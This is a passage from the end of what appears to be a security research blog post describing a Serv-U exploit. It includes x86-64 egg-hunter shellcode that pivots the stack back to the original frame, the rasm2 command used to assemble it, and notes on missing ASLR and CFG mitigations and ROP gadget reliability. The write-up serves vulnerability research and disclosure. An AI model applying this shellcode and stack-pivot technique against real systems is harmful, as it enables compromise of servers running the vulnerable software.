    The return address is 0x180141795 and always will be due to the absence of ASLR. Therefore to find the original stack I just hunt for 0x80141795 (the 4-byte DWORD equivalent of the 5-byte address 0x0180141795) starting at the address I pulled out of the PEB. I built the following egg hunter:

    # Egg hunter for the value 0x80141795 starting at the PEB's stack address.
    # No egg-not-found error handling because if this code is running then the 
    # stack frame we're looking for is guaranteed to exist.
    mov eax, 0x80141795           # saved RIP we want to find
    mov rcx, 0x4000               # how much memory will we search
    cld                           # clear DF, direction flag
    repne scasd eax, dword [rdi]  # find the saved stack ptr starting @ [rdi]
    mov rax, rdi                  # save the found stack address in rax    
    mov rdx, 0x140                # the top of the original stack frame is...
    sub rax, rdx                  # ...0x140 bytes upwards
    mov rsp, rax                  # pivot to the new (old!) stack

    You'll notice that some math is being done to subtract 0x140 from rax before writing it to rsp. This is to account for the fact that our egg - the saved return address - was not at the top of the stack frame list. In fact, it was index #4 and I need rsp to point at the frame index #0:

    # Child-SP           RetAddr               Call Site
    00 0000009d`d2aff320 00000000`72111cb8     LIBEAY32!CRYPTO_ctr128_encrypt+0xc6
    04 0000009d`d2aff460 00000001`80141795     Serv_U!CUPnPNotifyEvent::SetTimeout+0x22b7c

    The offset on the stack between #4 and #0 is 0x9dd2aff460 - 0x9dd2aff320 = 0x140 so I subtract that amount from rax before setting the stack pointer, rsp.

    One of the beautiful things about Radare2 is its ability to turn code into opcodes for shellcode. So the above code becomes:

     % cat /tmp/s.asm
    mov eax, 0x80141795
    mov rcx, 0x4000
    repne scasd eax, dword [rdi]
    mov rax, rdi
    mov rdx, 0x140
    sub rax, rdx
    mov rsp, rax
    % cat /tmp/s.asm | rasm2 -a x86 -b 64 -

    Simple and elegant.

    Lastly, I could return most of the registers to their pre-exploit values before returning control of execution to the old stack; doing so is left as an exercise for the reader.

    In Summary

    This was a fun exploit, and I got lucky a few times! The fact that ASLR was disabled on the Serv-U dll was crazy lucky and saved a lot of hassle. 

    Other mitigations, such as Control Flow Guard ("CFG"), were also disabled. This again made it easy to write an exploit without having to work around restricted access to critical functions, such as GetProcAddress().

    It's worth pointing out that the method I use to calculate the address of the ROP stack can, on occasion, generate an address that isn't 64-bit aligned. As a result, when GetProcAddress() reaches a MOVAPS instruction (which requires memory addresses to be aligned) the exploit crashes. To make the exploit more reliable, the solution is to force the ROP stack to be located at an aligned address; this would require some wrangling and is left as an exercise for the reader. 

    It should also be pointed out that the exploit is currently hard-coded for Serv-U To build against other Serv-U versions would require a little work to recalculate the ROP gadget addresses in Serv-U.dll. Hopefully, we'd find the same gadgets in the other versions of Serv-U, but I haven't looked yet.

    Let us know what you think; you can connect with us on social media and follow us on GitHub for more exploits!

    For more information on our continuous offensive security platform, you can get in touch with us via the Cosmos page.

    Subscribe to Bishop Fox's Security Blog

    Be first to learn about latest tools, advisories, and findings.

    Carl Livitt

    About the author, Carl Livitt

    Bishop Fox Alumnus

    Carl Livitt is a Bishop Fox alumnus. He was a Principal Researcher at Bishop Fox with decades of experience in mobile and application security, hardware and embedded devices, reverse engineering, and global-scale penetration testing.

    Carl is credited with the discovery of many vulnerabilities within both commercial and open-source software. He was brought in as a third-party expert to lead the team that confirmed several security issues with St. Jude Medical implantable devices. His work eventually led to an official communication from the FDA.

    Carl has served as a contributing author to Hacking Exposed Web Applications 3rd Edition as well as a technical advisor for Network Security Assessment 1st Edition. He has been interviewed on NPR and quoted in publications including USA Today and eWeek. Carl co-authored the iOS reverse engineering framework iSpy, which was featured at Black Hat USA's Tools Arsenal.

    More by Carl

    This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.